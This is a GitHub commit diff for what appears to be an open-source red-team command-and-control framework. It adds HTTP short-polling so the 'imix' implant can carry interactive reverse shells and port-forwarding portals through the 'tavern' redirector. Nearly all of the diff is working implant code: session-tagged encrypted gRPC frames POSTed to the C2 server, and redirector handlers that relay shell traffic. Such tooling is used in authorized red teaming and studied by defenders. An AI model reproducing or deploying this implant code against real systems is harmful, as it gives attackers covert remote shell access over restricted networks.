Skip to content

Commit 36ef934

Browse files
Http1 short polling interactive async (#2102)
* feat(http): implement HTTP short polling for ReverseShell and CreatePortal Update the HTTP/1.1 transport to support bidirectional streaming via short polling for `ReverseShell` and `CreatePortal`. This enables interactive connections across agents restricted to HTTP-only communications. - Define new gRPC stream configs for ReverseShell and CreatePortal. - Add `handleShortPollStreaming` in `tavern` HTTP redirector for decoding POST payloads and replying with backend payloads. - Update `http.rs` in `imix` transport to frequently POST requests to send output or ping, receiving commands iteratively. Co-authored-by: hulto <7121375+hulto@users.noreply.github.com> * Get data back but no input * input and output is working. * This seems to work stably just time-wait * stash * fmt * Explicitly disable keep alive * cleanup --------- Co-authored-by: google-labs-jules[bot] <161369871+google-labs-jules[bot]@users.noreply.github.com>
1 parent a7ddeb7 commit 36ef934

File tree

7 files changed

+510
-12
lines changed

7 files changed

+510
-12
lines changed

implants/lib/transport/Cargo.toml

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -39,6 +39,7 @@ rustls_0_21 = { package = "rustls", version = "0.21", features = ["dangerous_con
3939
http-body-util = "0.1"
4040
hyper-http-proxy = { version = "1.1.0", default-features = false, features = ["rustls-tls-native-roots"] }
4141
hyper-proxy-legacy = { package = "hyper-proxy", version = "0.9.1", default-features = false, features = ["rustls"] }
42+
uuid = { workspace = true, features = ["v4", "fast-rng"] }
4243
hickory-resolver = { version = "0.24", features = ["dns-over-https-rustls", "webpki-roots"], optional = true }
4344
base32 = { workspace = true, optional = true }
4445
rand = { workspace = true, optional = true }

implants/lib/transport/src/http.rs

Lines changed: 188 additions & 11 deletions
Original file line numberDiff line numberDiff line change
@@ -89,7 +89,8 @@ static REPORT_CREDENTIAL_PATH: &str = "/c2.C2/ReportCredential";
8989
static REPORT_FILE_PATH: &str = "/c2.C2/ReportFile";
9090
static REPORT_PROCESS_LIST_PATH: &str = "/c2.C2/ReportProcessList";
9191
static REPORT_OUTPUT_PATH: &str = "/c2.C2/ReportOutput";
92-
static _REVERSE_SHELL_PATH: &str = "/c2.C2/ReverseShell";
92+
static REVERSE_SHELL_PATH: &str = "/c2.C2/ReverseShell";
93+
static CREATE_PORTAL_PATH: &str = "/c2.C2/CreatePortal";
9394

9495
// Marshal: Encode and encrypt a message using the ChachaCodec
9596
// Uses the helper functions exported from pb::xchacha
@@ -166,6 +167,160 @@ impl std::fmt::Debug for HTTP {
166167
}
167168

168169
impl HTTP {
170+
async fn handle_short_poll_streaming<Req, Resp>(
171+
&self,
172+
mut rx: tokio::sync::mpsc::Receiver<Req>,
173+
tx: tokio::sync::mpsc::Sender<Resp>,
174+
path: &'static str,
175+
) -> Result<()>
176+
where
177+
Req: Message + Send + 'static,
178+
Resp: Message + Default + Send + 'static,
179+
{
180+
// Generate a unique session ID so the redirector can maintain a persistent
181+
// gRPC stream across multiple HTTP short-poll requests.
182+
let session_id = uuid::Uuid::new_v4().to_string();
183+
184+
loop {
185+
// Buffer to hold messages to send in this polling interval
186+
let mut messages = Vec::new();
187+
188+
// Check if there's any outgoing message (blocks until one is available or channel closed)
189+
match tokio::time::timeout(std::time::Duration::from_millis(50), rx.recv()).await {
190+
Ok(Some(msg)) => {
191+
messages.push(msg);
192+
193+
// Grab any other immediately available messages
194+
while let Ok(msg) = rx.try_recv() {
195+
messages.push(msg);
196+
}
197+
}
198+
Ok(None) => {
199+
// Channel closed, terminate streaming
200+
break;
201+
}
202+
Err(_) => {
203+
// Timeout (50ms elapsed, no message). Continue loop to send empty payload/ping
204+
}
205+
}
206+
207+
let data_sent = !messages.is_empty();
208+
209+
// Prepare the body with encoded gRPC frames
210+
let mut request_body = BytesMut::new();
211+
for msg in messages {
212+
let request_bytes = match marshal_with_codec::<Req, Resp>(msg) {
213+
Ok(bytes) => bytes,
214+
Err(err) => {
215+
#[cfg(debug_assertions)]
216+
log::error!("Failed to marshal streaming message: {}", err);
217+
continue;
218+
}
219+
};
220+
let frame_header = grpc_frame::FrameHeader::new(request_bytes.len() as u32);
221+
request_body.extend_from_slice(&frame_header.encode());
222+
request_body.extend_from_slice(&request_bytes);
223+
}
224+
225+
// Build and send the HTTP request with session header for persistent stream routing
226+
let uri = self.build_uri(path)?;
227+
let req = self
228+
.request_builder(uri)
229+
.header("X-Stream-Session-Id", &session_id)
230+
.body(hyper_legacy::Body::from(request_body.freeze()))
231+
.context("Failed to build HTTP request")?;
232+
233+
let response = match tokio::time::timeout(
234+
std::time::Duration::from_secs(30),
235+
self.send_and_validate(req),
236+
)
237+
.await
238+
{
239+
Ok(Ok(resp)) => resp,
240+
Ok(Err(err)) => {
241+
#[cfg(debug_assertions)]
242+
log::error!("Failed to send short poll HTTP request: {}", err);
243+
tokio::time::sleep(std::time::Duration::from_secs(1)).await;
244+
continue;
245+
}
246+
Err(_) => {
247+
#[cfg(debug_assertions)]
248+
log::error!("Short poll HTTP request timed out after 30s");
249+
tokio::time::sleep(std::time::Duration::from_secs(1)).await;
250+
continue;
251+
}
252+
};
253+
254+
// Read entire response body then decode gRPC frames and send via async channel.
255+
// We cannot use stream_grpc_frames here because its handler closure is synchronous,
256+
// and tokio::sync::mpsc::Sender requires async send (blocking_send panics in async context).
257+
let body_bytes = Self::read_response_body(response).await;
258+
let mut data_received = false;
259+
let result: Result<()> = match body_bytes {
260+
Ok(bytes) => {
261+
#[cfg(debug_assertions)]
262+
if !bytes.is_empty() {
263+
log::debug!("Received short poll response body: {} bytes", bytes.len());
264+
}
265+
let mut buffer = BytesMut::from(bytes.as_ref());
266+
let mut send_err = None;
267+
let mut frame_count = 0;
268+
while let Some((_header, encrypted_message)) =
269+
grpc_frame::FrameHeader::extract_frame(&mut buffer)
270+
{
271+
frame_count += 1;
272+
data_received = true;
273+
#[cfg(debug_assertions)]
274+
log::debug!(
275+
"Extracted frame {} from short poll response ({} bytes)",
276+
frame_count,
277+
encrypted_message.len()
278+
);
279+
280+
match unmarshal_with_codec::<Req, Resp>(&encrypted_message) {
281+
Ok(response_msg) => {
282+
#[cfg(debug_assertions)]
283+
log::debug!("Unmarshaled message {} from short poll response, sending to channel", frame_count);
284+
285+
if let Err(err) = tx.send(response_msg).await {
286+
send_err = Some(anyhow::anyhow!(
287+
"Failed to send response through channel: {}",
288+
err
289+
));
290+
break;
291+
}
292+
}
293+
Err(err) => {
294+
send_err = Some(err);
295+
break;
296+
}
297+
}
298+
}
299+
match send_err {
300+
Some(err) => Err(err),
301+
None => Ok(()),
302+
}
303+
}
304+
Err(err) => Err(err),
305+
};
306+
307+
if let Err(err) = result {
308+
#[cfg(debug_assertions)]
309+
log::error!("Failed to process response frames: {}", err);
310+
break;
311+
}
312+
313+
// Adding a small delay to prevent tight loop spinning if rx channel isn't busy
314+
if data_sent || data_received {
315+
tokio::task::yield_now().await;
316+
} else {
317+
tokio::time::sleep(std::time::Duration::from_millis(500)).await;
318+
}
319+
}
320+
321+
Ok(())
322+
}
323+
169324
/// Build URI from path
170325
fn build_uri(&self, path: &str) -> Result<hyper_legacy::Uri> {
171326
let url = format!("{}{}", self.base_url, path);
@@ -178,6 +333,7 @@ impl HTTP {
178333
.method(hyper_legacy::Method::POST)
179334
.uri(uri)
180335
.header("Content-Type", "application/grpc")
336+
.header("Connection", "close")
181337
}
182338

183339
/// Send HTTP request and validate status code
@@ -537,22 +693,43 @@ impl Transport for HTTP {
537693

538694
async fn reverse_shell(
539695
&mut self,
540-
_rx: tokio::sync::mpsc::Receiver<ReverseShellRequest>,
541-
_tx: tokio::sync::mpsc::Sender<ReverseShellResponse>,
696+
rx: tokio::sync::mpsc::Receiver<ReverseShellRequest>,
697+
tx: tokio::sync::mpsc::Sender<ReverseShellResponse>,
542698
) -> Result<()> {
543-
Err(anyhow::anyhow!(
544-
"http/1.1 transport does not support reverse shell"
545-
))
699+
// Spawn polling loop in background and return immediately.
700+
// The caller (pty.rs) expects reverse_shell() to return so the input
701+
// handling loop can run concurrently, matching the gRPC transport behavior.
702+
let transport = self.clone();
703+
tokio::spawn(async move {
704+
if let Err(_err) = transport
705+
.handle_short_poll_streaming(rx, tx, REVERSE_SHELL_PATH)
706+
.await
707+
{
708+
#[cfg(debug_assertions)]
709+
log::error!("reverse_shell short poll streaming ended: {}", _err);
710+
}
711+
});
712+
Ok(())
546713
}
547714

548715
async fn create_portal(
549716
&mut self,
550-
_rx: tokio::sync::mpsc::Receiver<CreatePortalRequest>,
551-
_tx: tokio::sync::mpsc::Sender<CreatePortalResponse>,
717+
rx: tokio::sync::mpsc::Receiver<CreatePortalRequest>,
718+
tx: tokio::sync::mpsc::Sender<CreatePortalResponse>,
552719
) -> Result<()> {
553-
Err(anyhow::anyhow!(
554-
"http/1.1 transport does not support portal"
555-
))
720+
// Spawn polling loop in background and return immediately,
721+
// matching the gRPC transport behavior.
722+
let transport = self.clone();
723+
tokio::spawn(async move {
724+
if let Err(_err) = transport
725+
.handle_short_poll_streaming(rx, tx, CREATE_PORTAL_PATH)
726+
.await
727+
{
728+
#[cfg(debug_assertions)]
729+
log::error!("create_portal short poll streaming ended: {}", _err);
730+
}
731+
});
732+
Ok(())
556733
}
557734

558735
fn get_type(&mut self) -> pb::c2::transport::Type {

tavern/internal/redirectors/http1/grpc_stream.go

Lines changed: 18 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -31,6 +31,24 @@ var (
3131
},
3232
MethodPath: "/c2.C2/ReportFile",
3333
}
34+
35+
reverseShellStream = streamConfig{
36+
Desc: grpc.StreamDesc{
37+
StreamName: "ReverseShell",
38+
ServerStreams: true,
39+
ClientStreams: true,
40+
},
41+
MethodPath: "/c2.C2/ReverseShell",
42+
}
43+
44+
createPortalStream = streamConfig{
45+
Desc: grpc.StreamDesc{
46+
StreamName: "CreatePortal",
47+
ServerStreams: true,
48+
ClientStreams: true,
49+
},
50+
MethodPath: "/c2.C2/CreatePortal",
51+
}
3452
)
3553

3654
// createStream creates a gRPC stream with the given configuration

tavern/internal/redirectors/http1/handlers.go

Lines changed: 73 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -94,6 +94,79 @@ func handleFetchAssetStreaming(w http.ResponseWriter, r *http.Request, conn *grp
9494
slog.Debug("http1 redirector: FetchAsset streaming complete", "chunks", chunkCount, "total_bytes", totalBytes)
9595
}
9696

97+
func handleShortPollStreaming(w http.ResponseWriter, r *http.Request, conn *grpc.ClientConn, cfg streamConfig) {
98+
if !requirePOST(w, r) {
99+
slog.Error("http1 redirector: incoming request rejected, method not allowed", "method", r.Method, "path", r.URL.Path, "source", r.RemoteAddr)
100+
return
101+
}
102+
103+
clientIP := getClientIP(r)
104+
slog.Debug("http1 redirector: short poll streaming request", "method", cfg.MethodPath, "source", clientIP)
105+
106+
sessionID := r.Header.Get(sessionHeader)
107+
if sessionID == "" {
108+
slog.Error("http1 redirector: missing session header", "method", cfg.MethodPath, "source", clientIP)
109+
http.Error(w, "Missing "+sessionHeader+" header", http.StatusBadRequest)
110+
return
111+
}
112+
113+
// Parse incoming gRPC stream data
114+
buffer, ok := readRequestBody(w, r)
115+
if !ok {
116+
slog.Error("http1 redirector: incoming request failed, could not read request body", "path", cfg.MethodPath, "source", clientIP)
117+
return
118+
}
119+
120+
// Get or create a persistent stream session
121+
sess, err := sessionManager.getOrCreate(sessionID, conn, cfg)
122+
if err != nil {
123+
slog.Error("http1 redirector: upstream request failed, could not create gRPC stream", "method", cfg.MethodPath, "error", err)
124+
handleStreamError(w, "Failed to create gRPC stream", err)
125+
return
126+
}
127+
128+
// Send all messages extracted from the poll body
129+
for {
130+
header, message, remaining, ok := extractFrame(buffer)
131+
if !ok {
132+
break
133+
}
134+
135+
buffer = remaining
136+
slog.Debug("http1 redirector: received short poll stream chunk", "compression", header.CompressionFlag, "length", header.MessageLength)
137+
138+
if err := sess.send(message); err != nil {
139+
slog.Error("http1 redirector: upstream request failed, could not send gRPC message", "method", cfg.MethodPath, "error", err)
140+
sessionManager.remove(sessionID)
141+
handleStreamError(w, "Failed to send gRPC message", err)
142+
return
143+
}
144+
}
145+
146+
// Drain any buffered server responses
147+
responses := sess.drain()
148+
149+
setGRPCResponseHeaders(w)
150+
151+
totalBytes := 0
152+
for _, responseChunk := range responses {
153+
totalBytes += len(responseChunk)
154+
155+
fh := newFrameHeader(uint32(len(responseChunk)))
156+
encodedHeader := fh.Encode()
157+
if _, err := w.Write(encodedHeader[:]); err != nil {
158+
slog.Error("http1 redirector: incoming request failed, could not write frame header to client", "error", err)
159+
return
160+
}
161+
162+
if _, err := w.Write(responseChunk); err != nil {
163+
slog.Error("http1 redirector: incoming request failed, could not write chunk to client", "error", err)
164+
return
165+
}
166+
}
167+
slog.Debug("http1 redirector: short poll streaming complete", "session_id", sessionID, "chunks", len(responses), "total_bytes", totalBytes)
168+
}
169+
97170
func handleReportFileStreaming(w http.ResponseWriter, r *http.Request, conn *grpc.ClientConn) {
98171
if !requirePOST(w, r) {
99172
slog.Error("http1 redirector: incoming request rejected, method not allowed", "method", r.Method, "path", r.URL.Path, "source", r.RemoteAddr)

tavern/internal/redirectors/http1/http.go

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -40,6 +40,7 @@ func readRequestBody(w http.ResponseWriter, r *http.Request) ([]byte, bool) {
4040
// setGRPCResponseHeaders sets standard gRPC response headers
4141
func setGRPCResponseHeaders(w http.ResponseWriter) {
4242
w.Header().Set("Content-Type", "application/grpc")
43+
w.Header().Set("Connection", "close")
4344
w.WriteHeader(http.StatusOK)
4445
}
4546

tavern/internal/redirectors/http1/redirector.go

Lines changed: 15 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -27,15 +27,22 @@ func (r *Redirector) Redirect(ctx context.Context, listenOn string, upstream *gr
2727
mux.HandleFunc("/c2.C2/ReportFile", func(w http.ResponseWriter, r *http.Request) {
2828
handleReportFileStreaming(w, r, upstream)
2929
})
30+
mux.HandleFunc("/c2.C2/ReverseShell", func(w http.ResponseWriter, r *http.Request) {
31+
handleShortPollStreaming(w, r, upstream, reverseShellStream)
32+
})
33+
mux.HandleFunc("/c2.C2/CreatePortal", func(w http.ResponseWriter, r *http.Request) {
34+
handleShortPollStreaming(w, r, upstream, createPortalStream)
35+
})
3036
mux.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
3137
handleHTTPRequest(w, r, upstream)
3238
})
3339

3440
srv := &http.Server{
3541
Addr: listenOn,
36-
Handler: mux,
42+
Handler: closeConnectionMiddleware(mux),
3743
TLSConfig: tlsConfig,
3844
}
45+
srv.SetKeepAlivesEnabled(false)
3946

4047
if tlsConfig != nil {
4148
slog.Debug("http1 redirector: TLS enabled", "listen_on", listenOn, "min_version", tlsConfig.MinVersion, "num_certificates", len(tlsConfig.Certificates))
@@ -46,3 +53,10 @@ func (r *Redirector) Redirect(ctx context.Context, listenOn string, upstream *gr
4653
slog.Info("http1 redirector: HTTP started", "listen_on", listenOn)
4754
return srv.ListenAndServe()
4855
}
56+
57+
func closeConnectionMiddleware(next http.Handler) http.Handler {
58+
return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
59+
w.Header().Set("Connection", "close")
60+
next.ServeHTTP(w, r)
61+
})
62+
}

0 commit comments

Comments
 (0)